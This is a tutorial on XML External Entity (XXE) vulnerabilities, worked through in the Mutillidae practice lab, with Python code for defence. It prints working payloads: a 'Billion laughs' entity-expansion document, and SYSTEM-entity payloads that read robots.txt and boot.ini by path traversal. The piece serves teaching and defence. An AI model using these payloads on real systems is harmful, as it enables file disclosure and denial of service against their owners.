A4: 2017 – XML External Entities (XXE)

XML is a very good way to store and organize data, and an XXE vulnerability takes advantage of the XML parser, not the data itself. It works like every other injection but has its own peculiarities. Overall, in my opinion, it's a little more complex than any other injection around.



Let's say we have an application that works with XML. Apps can work with XML directly, but they can also parse XML to extract some data for further processing. XML has come a long way, and one of its features today is that a document can contain references to other objects: various third-party web pages, or even the local file system, why not.

So an attacker can put a malicious payload in this external entity, and if the web application's parser doesn't validate its input, this payload will end up in the web application and do some damage. The malicious payload might force your application to execute some system commands, SQL queries or anything else. By the way, many modern XML parsers have their own XXE protection mechanisms.

A classic XXE attack example is called «Billion laughs». Let's take a closer look at this code:

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

When an XML parser loads this XML document, it sees that it contains one root element, «lolz», whose text is «&lol9;». But «&lol9;» is in fact a defined entity that expands to a string containing ten «&lol8;» strings. Each «&lol8;» is also a defined entity that expands to ten «&lol7;», and so on.

So these 15 lines of code are less than a single kilobyte in size, but once expanded they contain a billion «lol»s that take up about 3 gigabytes of RAM. A dozen requests like this and your server is down.
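To see where "less than a kilobyte in, about 3 gigabytes out" comes from, here is an added example (my own Python, not code from the post or from Mutillidae) that reads the internal entity declarations of a DTD and computes the expanded size of the root element's text without ever expanding it. The «Billion laughs» document is rebuilt by a small generator so the block stays short; the «Ha !» document from later in the post is embedded as-is. The regexes only handle the simple `<!ENTITY name "value">` form used on this page, which is an assumption of the example.

```python
import re

# Only internal general entities with a quoted literal value; SYSTEM/PUBLIC
# (external) entities deliberately do not match, they are a separate problem.
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&(\w+);')
# Root element with text-only content, as in <lolz>&lol9;</lolz>.
ROOT_TEXT = re.compile(r'<(\w+)>([^<]*)</\1>\s*$')


def billion_laughs_document(depth: int = 9) -> str:
    """Rebuild the post's «Billion laughs» document (constructed here for sizing only)."""
    decls = [' <!ENTITY lol "lol">', ' <!ELEMENT lolz (#PCDATA)>']
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        refs = f"&{prev};" * 10          # ten references to the previous level
        decls.append(f' <!ENTITY lol{i} "{refs}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f"\n]>\n<lolz>&lol{depth};</lolz>\n")


# The smaller example from the post, verbatim.
HA_DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE nn [
 <!ENTITY ha "Ha !">
 <!ENTITY ha2 "&ha; &ha;">
 <!ENTITY ha3 "&ha2; &ha2;">
 <!ENTITY ha4 "&ha3; &ha3;">
]>
<nn>&ha4;</nn>
"""


def internal_entities(doc: str) -> dict:
    """Map entity name -> literal replacement text for every internal entity in the DTD."""
    return dict(ENTITY_DECL.findall(doc))


def expanded_size(entities: dict, text: str, _cache=None, _stack=()) -> int:
    """Bytes `text` would occupy after full entity expansion, computed arithmetically.

    Each entity's size is computed once and cached, so the cost is linear in the
    number of declarations even though the expansion itself would be exponential.
    """
    if _cache is None:
        _cache = {}
    total = len(text.encode())
    for m in ENTITY_REF.finditer(text):
        name = m.group(1)
        if name not in entities:
            continue                     # &amp; etc. or undeclared: leave as written
        if name in _stack:
            raise ValueError(f"recursive entity &{name};")   # illegal XML, treat as hostile
        if name not in _cache:
            _cache[name] = expanded_size(entities, entities[name], _cache, _stack + (name,))
        total += _cache[name] - len(m.group(0))   # replace "&name;" by its expansion
    return total


def document_expansion(doc: str) -> tuple:
    """Return (raw document size in bytes, expanded size of the root element's text)."""
    entities = internal_entities(doc)
    m = ROOT_TEXT.search(doc)
    body = m.group(2) if m else ""
    return len(doc.encode()), expanded_size(entities, body)


def within_limit(doc: str, max_bytes: int) -> bool:
    """Cheap pre-parse check: would expanding this document stay under max_bytes?"""
    try:
        return document_expansion(doc)[1] <= max_bytes
    except ValueError:                   # recursive entities: reject outright
        return False


if __name__ == "__main__":
    raw, expanded = document_expansion(billion_laughs_document())
    print(f"billion laughs: {raw} bytes raw -> {expanded:,} bytes expanded")
    print(f"ha4 example:    {document_expansion(HA_DOCUMENT)[1]} bytes expanded")
```

For the nine-level document the arithmetic gives 3 bytes × 10⁹ = 3,000,000,000 bytes from roughly 800 bytes of input, which is the 3 GB the post mentions; the «Ha !» document expands to the 39 bytes of output shown further down. A check like `within_limit()` is a pre-filter only; the real fix is to configure the parser itself so entity expansion never happens (see the wrap-up at the end of the post).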

In Mutillidae we have a dedicated section for A4: «XML External Entities» > «XML External Entity Injection» > «XML Validator». Let's type in a simple XML document to get an idea of what this page is all about:

<hello> hey! </hello>

and hit «Validate XML». We can see that our XML was submitted and the text «Hey» was parsed. Now let's take this:

<?xml version="1.0"?>
<!DOCTYPE change-log [
 <!ENTITY systemEntity SYSTEM "robots.txt">
]>
<change-log>
 <text>&systemEntity;</text>
</change-log>

This example tries to display the robots.txt file, and since the application has the privilege to read it, it works:

User-agent: *
Disallow: passwords/
Disallow: config.inc
Disallow: classes/
Disallow: javascript/
Disallow: owasp-esapi-php/
Disallow: documentation/
Disallow: phpmyadmin/
Disallow: includes/

We have what we came for. It can just as well be a system file; let's change our XML a little:

<?xml version="1.0"?>
<!DOCTYPE change-log [
 <!ENTITY systemEntity SYSTEM "../../../boot.ini">
]>
<change-log>
 <text>&systemEntity;</text>
</change-log>

And here we go:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Server 2012 R2" /fastdetect /NoExecute=OptIn ;

We can try a «Billion laughs» here too, by the way. Let's just not laugh too hard and use a much smaller XML, because otherwise you'll overload your box in a second:

<?xml version="1.0"?>
<!DOCTYPE nn [
 <!ENTITY ha "Ha !">
 <!ENTITY ha2 "&ha; &ha;">
 <!ENTITY ha3 "&ha2; &ha2;">
 <!ENTITY ha4 "&ha3; &ha3;">
]>
<nn>&ha4;</nn>

The output here is:

Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha !

Let's wrap it up: XML injections are just as severe as any other type of injection. What can we do about it? Well, obviously we can disable external entity processing in our XML parser. It might break your web app logic, but hey, let's work with the developers and find an elegant solution. We can also implement XML validation on the server side. It's a much better way but takes some time. Another thing you can do is use source code analysis tools; these can check your code and find flaws for you automatically.
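What "disabling XXE in the parser" looks like in practice, as an added example (my own Python on the standard library's expat parser, not Mutillidae's PHP code): a parse routine that refuses any DOCTYPE, any entity declaration and any external entity reference before the parser can act on them, then returns the character data the way «XML Validator» echoes it back. The two sample documents are the ones from this post; the function and exception names are mine.

```python
import xml.parsers.expat


class ForbiddenXML(Exception):
    """Raised when a document uses DTD features this application never needs."""


def safe_text(data) -> str:
    """Parse `data` (str or bytes) and return its character data.

    A DOCTYPE, an entity declaration or an external entity reference aborts the
    parse immediately, so neither file disclosure through SYSTEM entities nor
    «Billion laughs» expansion can happen. Well-formedness errors surface as
    xml.parsers.expat.ExpatError, as usual.
    """
    parser = xml.parsers.expat.ParserCreate()
    chunks = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML(f"DOCTYPE {name!r} rejected: DTDs are not accepted")

    def reject_entity(name, is_parameter, value, base, sysid, pubid, notation):
        raise ForbiddenXML(f"entity declaration {name!r} rejected")

    def reject_external(context, base, sysid, pubid):
        raise ForbiddenXML(f"external entity {sysid!r} rejected")

    # Fail at the first sign of a DTD; the two later handlers are defence in depth.
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks).strip()


def is_accepted(data) -> bool:
    """True if the document parses under the hardened settings, False if rejected."""
    try:
        safe_text(data)
        return True
    except (ForbiddenXML, xml.parsers.expat.ExpatError):
        return False


# Sample inputs taken from the post above.
HELLO = "<hello> hey! </hello>"

XXE_ROBOTS = """<?xml version="1.0"?>
<!DOCTYPE change-log [
 <!ENTITY systemEntity SYSTEM "robots.txt">
]>
<change-log>
 <text>&systemEntity;</text>
</change-log>"""

HA_DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE nn [
 <!ENTITY ha "Ha !">
 <!ENTITY ha2 "&ha; &ha;">
 <!ENTITY ha3 "&ha2; &ha2;">
 <!ENTITY ha4 "&ha3; &ha3;">
]>
<nn>&ha4;</nn>"""


if __name__ == "__main__":
    print("hello:", safe_text(HELLO))
    for label, doc in (("robots.txt XXE", XXE_ROBOTS), ("ha4 expansion", HA_DOCUMENT)):
        try:
            safe_text(doc)
        except ForbiddenXML as exc:
            print(f"{label}: rejected ({exc})")
```

Rejecting the DOCTYPE outright is the simplest policy and the one most web APIs can live with, since their payloads never legitimately carry a DTD. The `defusedxml` package wraps the same handlers around the stdlib parsers if you would rather not write them yourself. In PHP, where Mutillidae lives, the equivalent is to never pass `LIBXML_NOENT` to `DOMDocument::loadXML()` and, on PHP 7 builds with an older libxml, to call `libxml_disable_entity_loader(true)` so SYSTEM entities cannot be fetched.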


If nothing helps… maybe it's time to stop using XML once and for all.
